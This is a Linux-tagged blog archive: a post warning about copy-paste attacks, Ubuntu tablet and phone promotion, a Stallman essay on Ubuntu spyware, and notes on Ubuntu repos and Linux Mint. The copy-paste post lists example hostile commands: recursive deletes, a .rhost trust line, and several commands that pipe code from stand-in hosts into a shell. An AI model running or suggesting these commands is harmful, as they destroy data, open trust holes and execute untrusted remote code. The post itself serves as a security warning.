Tag: Linux

Copy Paste Tricks back to their old tricks again

Copy Paste Tricks back to their old tricks again

In an article on The H, they explain why it’s not good to simply copy and paste stuff you get from a website tutorial. What seems like a harmless command could be hiding something very dangerous.

When a user pastes what they think is an innocent command that does what the page they pasted it from advertises, another command is actually executed with their credentials automatically. This could delete all of their data or send them to a server on the public internet. If the user is still authenticated with sudo on a Linux machine, the command could even be executed with administrator privileges which could lead to much more dangerous results.

See the article here

User iteraction based exploitation: WYSINWYC (What you see is not what you copy)

When working with computers you know if there is or not a reliable and deterministic way to exploit them, ineed when working with humans there’s no certezza. Technical people often prefear to stay technical and avoid humans. This is infact our first article witch need direct human iteraction to work.

The presented technique relay on a special type of “rich text”  copy where the apparently inncuos payload is pasted in a different context able to parse it. This is especially true, but definitely not limited to, online how-to.

The core concept of the attack is that the displayed text (and thus the data the user thinks to have copied) is different from what the browser have in realy copied.

A list of real life example follows, just to give you an idea.

Small commands:

rm -rf /
del /F /S /Q * # windows
/opt/custom/app abuse_my_functionality
echo "*" > ~/.rhost

Remote storage over http

GET example.com|bash
wget -q example.com -O-|bash
curl -s example.com|bash
echo -en "GET /\n\n"|nc example.com 80|bash

The shortest that comes to my mind is “GET ush.it|sh” (13 chars).

Other remote storage fetch methods

nc example.com
dig AXFR evil.com @evil-dns-with-53-tcp # since zone transfers use TCP

As you can see small commands are limited in terms of flexibility and remote fetch/exec can be made useless by network protections (egress filtering, my-work-is-grep ids) and configuration issues (missing  routing, machine offline, personal firewall, etc).

Excerpted from an article on ush.it

Ubuntu Tablet

Ubuntu Tablet

Finally the next step in a fully integrated system setup.
Desktop, Phone, TV, Tablet …  All running the same OS fully integrated. Welcome to the future.

The tablet OS will be made available to devs and enthusiasts at the exact same time as the smartphone preview on February 21st. So in addition to the Galaxy Nexus and Nexus 4, you’ll also be able to get a taste of touch-based Ubuntu on a Nexus 7 or Nexus 10.

Ubuntu’s unique side stage places a phone and a tablet app on the same screen at the same time for amazing tablet productivity. True multitasking comes to the tablet. Take calls in Skype while you work in a document, make notes on the side while you surf the web, tweet while you watch a movie. Or use apps collaboratively – drag content from one app to another for a super-productive day. We’ve reinvented the tablet as a bridge between phone and PC.

Multi Accounts

Your Ubuntu tablet has multiple secure user accounts, and a guest account. Perfect for families and friends, and ideal for the office, with secure multi-user logins that make using and sharing devices safe.

Magic Edges

Use all four edges of the screen to navigate between apps, settings and controls. There are no buttons on the Ubuntu tablet, you don’t have to keep returning to the home screen every time you want to switch apps – everything is available at a swipe. Leaner, cleaner, more elegant hardware designs are possible with Ubuntu – the result is a joy to use.

Instant Launch

The left edge holds your favourite apps, so all the things you use most are only a touch away. Here you can see what’s running, switch between apps or launch your favourites quickly.

Voice Control HUD

The Ubuntu HUD makes complex application workflows simple on touch devices. This brings all the power of the PC to your touch device. And with voice control, it’s as if you had an extra set of hands – a truly personal assistant.


Instant share and Cloud

Sharing is now built-in, with support for all the major networks. So any app can let you share with friends, family and co-workers. One touch is all it takes.Facebook and Twitter aren’t the only ways to share. Ubuntu One already has millions of users on Ubuntu, Android, Windows and Mac. Deeply integrated on Ubuntu devices, it provides free storage, paid-for music streaming services and a foundation for cloud-based services from operators and device makers.


Web applications sit alongside native apps as equal citizens on Ubuntu – with their own icons and access to system services. Facebook, Twitter, Google Maps, Gmail and Spotify are all available from day one – thanks to Ubuntu’s brilliant web app system, developers can easily make their site install on the tablet as an app.We aren’t limited to HTML5. Native apps are blazingly fast, taking advantage of the full capabilities of the tablet’s processor and graphics hardware. A mobile SDK does most of the work for you, giving you that Ubuntu style. It’s easy for Android and Blackberry developers to publish for the Ubuntu audience too, and since you’re already running Ubuntu on your development workstations, everything you need is at your fingertips.


Ubuntu presents results from hundred of sources in one gorgeous page, saving you the trouble of comparison shopping or hunting down the right provider. You’ll see information from your email and phone contacts alongside Facebook friends and followers on Twitter.Looking for music? Ubuntu doesn’t just search the tunes on your tablet, it also searches online, giving you a choice of tracks you don’t yet own. It’s really one search to rule them all.


The stylish home screen organises all your most important information, selected from hundreds of sources – online or on board. You can customise the screen and search for any kind of content. Watch what you want with a single touch – no need to worry which app to find it in.


Just add a keyboard and mouse and your high-end tablet becomes a PC that’s ready for business. Ubuntu is popular in the enterprise for its robust security, great usability and standard management. The addition of a tablet experience provides complete mobility as well as productivity. Since it is all pure Ubuntu, the tablet can do everything a desktop computer can, including act as a thin client with access to remote Windows apps and desktops. The best of all worlds, in one device.

One app on Ubuntu for all form factors

Perhaps the most exciting thing about writing native apps for Ubuntu is the opportunity to write and build a single app with responsive interfaces that allow it to run on any Ubuntu device. In other words, you can use the Ubuntu SDK to build your app and, with some care and attention, make it available to users of Ubuntu PCs, phones and tablets – all in a single upload to the Ubuntu Software Centre.

Ubuntu now fits your phone

Ubuntu now fits your phone

Introducing the superphone that’s  also a full PC

  • Your phone is more immersive, the screen is less cluttered, and you flow naturally from app to app with edge magic. The phone becomes a full PC and thin client when docked.
  • With all-native core apps and no Java overhead, Ubuntu runs well on entry-level smartphones – yet it uses the same drivers as Android. Continue reading “Ubuntu now fits your phone”

Stallman says Ubuntu spyware makes it just as bad as Windows

Posted by Richard Stallman at Dec 07, 2012 01:53 AM
One of the major advantages of free software is that the community protects users from malicious software. Now Ubuntu GNU/Linux has become a counterexample. What should we do?

Proprietary software is associated with malicious treatment of the user: surveillance code, digital handcuffs (DRM or Digital Restrictions Management) to restrict users, and back doors that can do nasty things under remote control. Programs that do any of these things are malware and should be treated as such. Widely used examples include Windows, the iThings, and the Amazon “Kindle” product for virtual book burning, which do all three; Macintosh and the Playstation III which impose DRM; most portable phones, which do spying and have back doors; Adobe Flash Player, which does spying and enforces DRM; and plenty of apps for iThings and Android, which are guilty of one or more of these nasty practices.

English: Richard Stallman gives a talk on Free...
Richard Stallman gives a talk on Free Software and Copyright law at The University of Pittsburgh (Photo credit: Wikipedia)

Free software gives users a chance to protect themselves from malicious software behaviors. Even better, usually the community protects everyone, and most users don’t have to move a muscle. Here’s how.

Once in a while, users who know programming find that a free program has malicious code. Generally the next thing they do is release a corrected version of the program; with the four freedoms that define free software (see http://www.gnu.org/philosophy/free-sw.html), they are free to do this. This is called a “fork” of the program. Soon the community switches to the corrected fork, and the malicious version is rejected. The prospect of ignominious rejection is not very tempting; thus, most of the time, even those who are not stopped by their consciences and social pressure refrain from putting malfeatures in free software. Continue reading “Stallman says Ubuntu spyware makes it just as bad as Windows”

Custom repos for Ubuntu 10.04 LTS Lucid Lynx

I had to setup an Ubuntu laptop for a customer. Tried to get him on Debian or Mint at least, but he refused to accept anything but Ubuntu as he was advised by the Tech guy at his work to go with Ubuntu. I went ahead and setup the 10.04 LTS version and advised him not to upgrade until after 11-2013 when Canonical will stop supporting it. Hopefully by then he would have learned enough and would be willing to try Debian.

After the install, I did a custom setup for his updates and packages. I thought I would share it with you all. You can also choose to not include the Third Party stuff.

Continue reading “Custom repos for Ubuntu 10.04 LTS Lucid Lynx”

Linux Mint – A Quick Overview

Español: Logo Linux Mint
Image via Wikipedia

I had been a faithful follower of Ubuntu since my introduction to Linux a few years back and I dipped my toes in the Fedora and Debian pools for a bit as well. Recently Ubuntu decided to change things up with the Unity desktop and while it’s nice and flashy, it leaves a lot to long for from a System Administrator aspect, for me at least. They are focusing too much on being the eye candy of Linux and competing with Windows for who looks better, in that process they are leaving behind the reason we use Linux instead of Windows.

Ubuntu at one time was poised on becoming the destop Linux market. Now don’t get me wrong, there is still plenty of reasons to stay with Ubuntu, especially if you are not a power user, my problem is that they choose to FORCE their choices upon us users, much to the Microsoft way instead of leaving an option like they did with their earlier release.

Continue reading “Linux Mint – A Quick Overview”